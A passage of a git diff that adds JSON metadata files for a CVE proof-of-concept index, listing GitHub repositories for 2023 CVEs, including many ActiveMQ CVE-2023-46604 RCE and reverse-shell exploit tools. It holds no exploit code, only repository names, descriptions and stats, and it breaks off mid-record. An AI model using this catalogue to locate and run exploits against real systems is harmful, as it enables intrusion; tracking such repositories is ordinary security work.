+ "description": "Popup by Supsystic <= 1.10.19 - Missing Authorization to Sensitive Information Exposure",
+ "fork": false,
+ "created_at": "2023-10-23T12:38:37Z",
+ "updated_at": "2023-10-23T12:38:37Z",
+ "pushed_at": "2023-10-23T12:44:19Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46304.json b/2023/CVE-2023-46304.json
new file mode 100644
index 0000000000..47dffbcfe6
--- /dev/null
+++ b/2023/CVE-2023-46304.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 781611038,
+ "name": "CVE-2023-46304",
+ "full_name": "jselliott\/CVE-2023-46304",
+ "owner": {
+ "login": "jselliott",
+ "id": 13350778,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13350778?v=4",
+ "html_url": "https:\/\/github.com\/jselliott"
+ },
+ "html_url": "https:\/\/github.com\/jselliott\/CVE-2023-46304",
+ "description": "Authenticated Remote Code Execution in in VTiger Open Source CRM v7.5",
+ "fork": false,
+ "created_at": "2024-04-03T17:57:23Z",
+ "updated_at": "2024-04-03T18:15:17Z",
+ "pushed_at": "2024-04-03T19:00:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4631.json b/2023/CVE-2023-4631.json
new file mode 100644
index 0000000000..6b1abeb1d2
--- /dev/null
+++ b/2023/CVE-2023-4631.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 695793018,
+ "name": "CVE-2023-4631",
+ "full_name": "b0marek\/CVE-2023-4631",
+ "owner": {
+ "login": "b0marek",
+ "id": 144051679,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144051679?v=4",
+ "html_url": "https:\/\/github.com\/b0marek"
+ },
+ "html_url": "https:\/\/github.com\/b0marek\/CVE-2023-4631",
+ "description": "Repository for CVE-2023-4631 vulnerability. ",
+ "fork": false,
+ "created_at": "2023-09-24T08:38:58Z",
+ "updated_at": "2023-09-24T08:38:59Z",
+ "pushed_at": "2023-09-24T08:44:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4634.json b/2023/CVE-2023-4634.json
new file mode 100644
index 0000000000..c40a4898ff
--- /dev/null
+++ b/2023/CVE-2023-4634.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 687359738,
+ "name": "CVE-2023-4634",
+ "full_name": "Patrowl\/CVE-2023-4634",
+ "owner": {
+ "login": "Patrowl",
+ "id": 28858120,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28858120?v=4",
+ "html_url": "https:\/\/github.com\/Patrowl"
+ },
+ "html_url": "https:\/\/github.com\/Patrowl\/CVE-2023-4634",
+ "description": "CVE-2023-4634",
+ "fork": false,
+ "created_at": "2023-09-05T07:44:15Z",
+ "updated_at": "2024-06-07T18:34:56Z",
+ "pushed_at": "2023-09-07T05:36:10Z",
+ "stargazers_count": 43,
+ "watchers_count": 43,
+ "has_discussions": false,
+ "forks_count": 10,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 10,
+ "watchers": 43,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46344.json b/2023/CVE-2023-46344.json
new file mode 100644
index 0000000000..0f8fdace55
--- /dev/null
+++ b/2023/CVE-2023-46344.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 736803632,
+ "name": "CVE-2023-46344",
+ "full_name": "vinnie1717\/CVE-2023-46344",
+ "owner": {
+ "login": "vinnie1717",
+ "id": 28691535,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28691535?v=4",
+ "html_url": "https:\/\/github.com\/vinnie1717"
+ },
+ "html_url": "https:\/\/github.com\/vinnie1717\/CVE-2023-46344",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-28T23:29:53Z",
+ "updated_at": "2023-12-28T23:29:53Z",
+ "pushed_at": "2023-12-28T23:33:43Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-4636.json b/2023/CVE-2023-4636.json
new file mode 100644
index 0000000000..657256a887
--- /dev/null
+++ b/2023/CVE-2023-4636.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 731273709,
+ "name": "CVE-2023-4636",
+ "full_name": "ThatNotEasy\/CVE-2023-4636",
+ "owner": {
+ "login": "ThatNotEasy",
+ "id": 25004320,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25004320?v=4",
+ "html_url": "https:\/\/github.com\/ThatNotEasy"
+ },
+ "html_url": "https:\/\/github.com\/ThatNotEasy\/CVE-2023-4636",
+ "description": "Unauthenticated Remote Code Execution with default Imagick",
+ "fork": false,
+ "created_at": "2023-12-13T17:59:02Z",
+ "updated_at": "2023-12-13T18:06:18Z",
+ "pushed_at": "2023-12-13T18:06:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46404.json b/2023/CVE-2023-46404.json
new file mode 100644
index 0000000000..d3728fef33
--- /dev/null
+++ b/2023/CVE-2023-46404.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 710370837,
+ "name": "CVE-2023-46404",
+ "full_name": "windecks\/CVE-2023-46404",
+ "owner": {
+ "login": "windecks",
+ "id": 55925786,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55925786?v=4",
+ "html_url": "https:\/\/github.com\/windecks"
+ },
+ "html_url": "https:\/\/github.com\/windecks\/CVE-2023-46404",
+ "description": "PoC and Writeup for CVE-2023-46404.",
+ "fork": false,
+ "created_at": "2023-10-26T15:01:32Z",
+ "updated_at": "2023-11-13T18:42:18Z",
+ "pushed_at": "2023-10-28T17:53:06Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46442.json b/2023/CVE-2023-46442.json
new file mode 100644
index 0000000000..8fd1d3292d
--- /dev/null
+++ b/2023/CVE-2023-46442.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 805310377,
+ "name": "CVE-2023-46442_POC",
+ "full_name": "JAckLosingHeart\/CVE-2023-46442_POC",
+ "owner": {
+ "login": "JAckLosingHeart",
+ "id": 57932150,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57932150?v=4",
+ "html_url": "https:\/\/github.com\/JAckLosingHeart"
+ },
+ "html_url": "https:\/\/github.com\/JAckLosingHeart\/CVE-2023-46442_POC",
+ "description": "POC for CVE-2023-46442 Denial of Service vulnerability found within Soot",
+ "fork": false,
+ "created_at": "2024-05-24T10:03:38Z",
+ "updated_at": "2024-05-31T05:49:20Z",
+ "pushed_at": "2024-05-24T12:04:58Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46449.json b/2023/CVE-2023-46449.json
new file mode 100644
index 0000000000..6a9ed0fccb
--- /dev/null
+++ b/2023/CVE-2023-46449.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 710291166,
+ "name": "CVE-2023-46449",
+ "full_name": "sajaljat\/CVE-2023-46449",
+ "owner": {
+ "login": "sajaljat",
+ "id": 142223862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4",
+ "html_url": "https:\/\/github.com\/sajaljat"
+ },
+ "html_url": "https:\/\/github.com\/sajaljat\/CVE-2023-46449",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-26T12:03:29Z",
+ "updated_at": "2023-10-26T12:03:30Z",
+ "pushed_at": "2023-10-26T20:59:01Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46450.json b/2023/CVE-2023-46450.json
new file mode 100644
index 0000000000..466ebb8877
--- /dev/null
+++ b/2023/CVE-2023-46450.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 710302205,
+ "name": "-CVE-2023-46450",
+ "full_name": "yte121\/-CVE-2023-46450",
+ "owner": {
+ "login": "yte121",
+ "id": 55489792,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55489792?v=4",
+ "html_url": "https:\/\/github.com\/yte121"
+ },
+ "html_url": "https:\/\/github.com\/yte121\/-CVE-2023-46450",
+ "description": " CVE-2023-46450 reference",
+ "fork": false,
+ "created_at": "2023-10-26T12:30:21Z",
+ "updated_at": "2023-10-26T12:30:21Z",
+ "pushed_at": "2023-10-26T20:59:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46451.json b/2023/CVE-2023-46451.json
new file mode 100644
index 0000000000..fcceb01567
--- /dev/null
+++ b/2023/CVE-2023-46451.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 710303698,
+ "name": "CVE-2023-46451",
+ "full_name": "sajaljat\/CVE-2023-46451",
+ "owner": {
+ "login": "sajaljat",
+ "id": 142223862,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142223862?v=4",
+ "html_url": "https:\/\/github.com\/sajaljat"
+ },
+ "html_url": "https:\/\/github.com\/sajaljat\/CVE-2023-46451",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-26T12:34:03Z",
+ "updated_at": "2023-10-26T12:34:03Z",
+ "pushed_at": "2023-10-26T21:01:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46454.json b/2023/CVE-2023-46454.json
new file mode 100644
index 0000000000..295d5b503e
--- /dev/null
+++ b/2023/CVE-2023-46454.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 728920376,
+ "name": "GL.iNet-Multiple-Vulnerabilities",
+ "full_name": "cyberaz0r\/GL.iNet-Multiple-Vulnerabilities",
+ "owner": {
+ "login": "cyberaz0r",
+ "id": 35109470,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35109470?v=4",
+ "html_url": "https:\/\/github.com\/cyberaz0r"
+ },
+ "html_url": "https:\/\/github.com\/cyberaz0r\/GL.iNet-Multiple-Vulnerabilities",
+ "description": "Exploits for GL.iNet CVE-2023-46454, CVE-2023-46455 and CVE-2023-46456",
+ "fork": false,
+ "created_at": "2023-12-08T01:45:16Z",
+ "updated_at": "2024-02-15T02:08:56Z",
+ "pushed_at": "2023-12-08T04:35:40Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46474.json b/2023/CVE-2023-46474.json
new file mode 100644
index 0000000000..4b8237f47c
--- /dev/null
+++ b/2023/CVE-2023-46474.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 741848730,
+ "name": "CVE-2023-46474",
+ "full_name": "Xn2\/CVE-2023-46474",
+ "owner": {
+ "login": "Xn2",
+ "id": 19215931,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19215931?v=4",
+ "html_url": "https:\/\/github.com\/Xn2"
+ },
+ "html_url": "https:\/\/github.com\/Xn2\/CVE-2023-46474",
+ "description": "Technical details for CVE-2023-46474",
+ "fork": false,
+ "created_at": "2024-01-11T08:35:18Z",
+ "updated_at": "2024-01-12T17:13:16Z",
+ "pushed_at": "2024-01-11T08:40:26Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46478.json b/2023/CVE-2023-46478.json
new file mode 100644
index 0000000000..a8c96a1e12
--- /dev/null
+++ b/2023/CVE-2023-46478.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 711887805,
+ "name": "CVE-2023-46478",
+ "full_name": "mr-xmen786\/CVE-2023-46478",
+ "owner": {
+ "login": "mr-xmen786",
+ "id": 79393031,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79393031?v=4",
+ "html_url": "https:\/\/github.com\/mr-xmen786"
+ },
+ "html_url": "https:\/\/github.com\/mr-xmen786\/CVE-2023-46478",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-30T11:28:43Z",
+ "updated_at": "2023-10-30T11:28:44Z",
+ "pushed_at": "2023-10-30T14:01:40Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46480.json b/2023/CVE-2023-46480.json
new file mode 100644
index 0000000000..5bbcb1a1fd
--- /dev/null
+++ b/2023/CVE-2023-46480.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 711124162,
+ "name": "CVE-2023-46480",
+ "full_name": "shahzaibak96\/CVE-2023-46480",
+ "owner": {
+ "login": "shahzaibak96",
+ "id": 28569761,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28569761?v=4",
+ "html_url": "https:\/\/github.com\/shahzaibak96"
+ },
+ "html_url": "https:\/\/github.com\/shahzaibak96\/CVE-2023-46480",
+ "description": "OwnCast SSRF",
+ "fork": false,
+ "created_at": "2023-10-28T09:36:31Z",
+ "updated_at": "2024-02-23T20:38:21Z",
+ "pushed_at": "2023-10-28T09:41:58Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46501.json b/2023/CVE-2023-46501.json
new file mode 100644
index 0000000000..53c7f5eb9a
--- /dev/null
+++ b/2023/CVE-2023-46501.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 712418367,
+ "name": "CVE-2023-46501",
+ "full_name": "Cyber-Wo0dy\/CVE-2023-46501",
+ "owner": {
+ "login": "Cyber-Wo0dy",
+ "id": 148460873,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148460873?v=4",
+ "html_url": "https:\/\/github.com\/Cyber-Wo0dy"
+ },
+ "html_url": "https:\/\/github.com\/Cyber-Wo0dy\/CVE-2023-46501",
+ "description": "BoltWire v6.03 vulnerable to \"Improper Access Control\"",
+ "fork": false,
+ "created_at": "2023-10-31T12:40:14Z",
+ "updated_at": "2024-06-17T07:58:34Z",
+ "pushed_at": "2023-10-31T12:41:20Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-46604.json b/2023/CVE-2023-46604.json
new file mode 100644
index 0000000000..57882a4fc0
--- /dev/null
+++ b/2023/CVE-2023-46604.json
@@ -0,0 +1,787 @@
+[
+ {
+ "id": 710110251,
+ "name": "ActiveMQ-RCE",
+ "full_name": "trganda\/ActiveMQ-RCE",
+ "owner": {
+ "login": "trganda",
+ "id": 62204882,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62204882?v=4",
+ "html_url": "https:\/\/github.com\/trganda"
+ },
+ "html_url": "https:\/\/github.com\/trganda\/ActiveMQ-RCE",
+ "description": "CVE-2023-46604",
+ "fork": false,
+ "created_at": "2023-10-26T03:25:05Z",
+ "updated_at": "2024-05-16T02:37:15Z",
+ "pushed_at": "2023-10-26T03:28:14Z",
+ "stargazers_count": 28,
+ "watchers_count": 28,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 28,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 710638824,
+ "name": "ActiveMQ-RCE",
+ "full_name": "X1r0z\/ActiveMQ-RCE",
+ "owner": {
+ "login": "X1r0z",
+ "id": 28532286,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28532286?v=4",
+ "html_url": "https:\/\/github.com\/X1r0z"
+ },
+ "html_url": "https:\/\/github.com\/X1r0z\/ActiveMQ-RCE",
+ "description": "ActiveMQ RCE (CVE-2023-46604) 漏洞利用工具",
+ "fork": false,
+ "created_at": "2023-10-27T05:57:21Z",
+ "updated_at": "2024-06-25T07:02:35Z",
+ "pushed_at": "2024-01-29T02:28:11Z",
+ "stargazers_count": 210,
+ "watchers_count": 210,
+ "has_discussions": false,
+ "forks_count": 29,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 29,
+ "watchers": 210,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 710778413,
+ "name": "ActiveMQ_RCE_Pro_Max",
+ "full_name": "JaneMandy\/ActiveMQ_RCE_Pro_Max",
+ "owner": {
+ "login": "JaneMandy",
+ "id": 36792635,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36792635?v=4",
+ "html_url": "https:\/\/github.com\/JaneMandy"
+ },
+ "html_url": "https:\/\/github.com\/JaneMandy\/ActiveMQ_RCE_Pro_Max",
+ "description": "CVE-2023-46604",
+ "fork": false,
+ "created_at": "2023-10-27T12:22:43Z",
+ "updated_at": "2024-06-25T05:54:16Z",
+ "pushed_at": "2023-11-03T14:14:31Z",
+ "stargazers_count": 61,
+ "watchers_count": 61,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 61,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 714084454,
+ "name": "CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ",
+ "full_name": "SaumyajeetDas\/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ",
+ "owner": {
+ "login": "SaumyajeetDas",
+ "id": 66937297,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66937297?v=4",
+ "html_url": "https:\/\/github.com\/SaumyajeetDas"
+ },
+ "html_url": "https:\/\/github.com\/SaumyajeetDas\/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ",
+ "description": " Achieving a Reverse Shell Exploit for Apache ActiveMQ (CVE_2023-46604) ",
+ "fork": false,
+ "created_at": "2023-11-03T22:06:09Z",
+ "updated_at": "2024-06-14T17:33:46Z",
+ "pushed_at": "2024-01-20T16:59:23Z",
+ "stargazers_count": 100,
+ "watchers_count": 100,
+ "has_discussions": false,
+ "forks_count": 31,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 31,
+ "watchers": 100,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 714263844,
+ "name": "CVE-2023-46604",
+ "full_name": "evkl1d\/CVE-2023-46604",
+ "owner": {
+ "login": "evkl1d",
+ "id": 113887123,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113887123?v=4",
+ "html_url": "https:\/\/github.com\/evkl1d"
+ },
+ "html_url": "https:\/\/github.com\/evkl1d\/CVE-2023-46604",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-04T11:58:21Z",
+ "updated_at": "2024-06-05T11:07:34Z",
+ "pushed_at": "2023-11-06T07:26:30Z",
+ "stargazers_count": 24,
+ "watchers_count": 24,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 24,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 714895258,
+ "name": "CVE-2023-46604",
+ "full_name": "sule01u\/CVE-2023-46604",
+ "owner": {
+ "login": "sule01u",
+ "id": 33783361,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33783361?v=4",
+ "html_url": "https:\/\/github.com\/sule01u"
+ },
+ "html_url": "https:\/\/github.com\/sule01u\/CVE-2023-46604",
+ "description": " CVE-2023-46604 ActiveMQ RCE vulnerability verification\/exploitation tool",
+ "fork": false,
+ "created_at": "2023-11-06T04:05:51Z",
+ "updated_at": "2024-05-14T03:14:48Z",
+ "pushed_at": "2023-11-12T10:40:14Z",
+ "stargazers_count": 35,
+ "watchers_count": 35,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-46604"
+ ],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 35,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 715968405,
+ "name": "CVE-2023-46604-Apache-ActiveMQ-RCE-exp",
+ "full_name": "justdoit-cai\/CVE-2023-46604-Apache-ActiveMQ-RCE-exp",
+ "owner": {
+ "login": "justdoit-cai",
+ "id": 126458073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/126458073?v=4",
+ "html_url": "https:\/\/github.com\/justdoit-cai"
+ },
+ "html_url": "https:\/\/github.com\/justdoit-cai\/CVE-2023-46604-Apache-ActiveMQ-RCE-exp",
+ "description": "CVE-2023-46604 Apache ActiveMQ RCE exp 基于python",
+ "fork": false,
+ "created_at": "2023-11-08T07:48:00Z",
+ "updated_at": "2023-12-06T06:14:14Z",
+ "pushed_at": "2023-11-08T07:52:43Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 716551880,
+ "name": "ActiveMQ-RCE-CVE-2023-46604-Write-up",
+ "full_name": "h3x3h0g\/ActiveMQ-RCE-CVE-2023-46604-Write-up",
+ "owner": {
+ "login": "h3x3h0g",
+ "id": 128398565,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128398565?v=4",
+ "html_url": "https:\/\/github.com\/h3x3h0g"
+ },
+ "html_url": "https:\/\/github.com\/h3x3h0g\/ActiveMQ-RCE-CVE-2023-46604-Write-up",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-09T11:27:20Z",
+ "updated_at": "2023-11-15T10:22:43Z",
+ "pushed_at": "2023-11-09T11:36:18Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 717720175,
+ "name": "CVE-2023-46604-ActiveMQ-RCE-pseudoshell",
+ "full_name": "duck-sec\/CVE-2023-46604-ActiveMQ-RCE-pseudoshell",
+ "owner": {
+ "login": "duck-sec",
+ "id": 129839654,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129839654?v=4",
+ "html_url": "https:\/\/github.com\/duck-sec"
+ },
+ "html_url": "https:\/\/github.com\/duck-sec\/CVE-2023-46604-ActiveMQ-RCE-pseudoshell",
+ "description": "This script leverages CVE-2023046604 (Apache ActiveMQ) to generate a pseudo shell. The vulnerability allows for remote code execution due to unsafe deserialization within the OpenWire protocol.",
+ "fork": false,
+ "created_at": "2023-11-12T11:26:46Z",
+ "updated_at": "2024-04-23T16:37:05Z",
+ "pushed_at": "2024-01-24T13:44:29Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 719245638,
+ "name": "CVE-2023-46604-POC",
+ "full_name": "vjayant93\/CVE-2023-46604-POC",
+ "owner": {
+ "login": "vjayant93",
+ "id": 47580148,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47580148?v=4",
+ "html_url": "https:\/\/github.com\/vjayant93"
+ },
+ "html_url": "https:\/\/github.com\/vjayant93\/CVE-2023-46604-POC",
+ "description": "POC repo for CVE-2023-46604",
+ "fork": false,
+ "created_at": "2023-11-15T19:11:01Z",
+ "updated_at": "2023-11-15T19:11:02Z",
+ "pushed_at": "2023-11-16T21:21:54Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 719369149,
+ "name": "CVE-2023-46604_ActiveMQ_RCE_Recurrence",
+ "full_name": "LiritoShawshark\/CVE-2023-46604_ActiveMQ_RCE_Recurrence",
+ "owner": {
+ "login": "LiritoShawshark",
+ "id": 56113617,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56113617?v=4",
+ "html_url": "https:\/\/github.com\/LiritoShawshark"
+ },
+ "html_url": "https:\/\/github.com\/LiritoShawshark\/CVE-2023-46604_ActiveMQ_RCE_Recurrence",
+ "description": "CVE-2023-46604环境复现包",
+ "fork": false,
+ "created_at": "2023-11-16T02:36:07Z",
+ "updated_at": "2024-01-24T04:49:52Z",
+ "pushed_at": "2023-11-16T02:37:56Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 720423496,
+ "name": "CVE-2023-46604-RCE",
+ "full_name": "NKeshawarz\/CVE-2023-46604-RCE",
+ "owner": {
+ "login": "NKeshawarz",
+ "id": 151177833,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151177833?v=4",
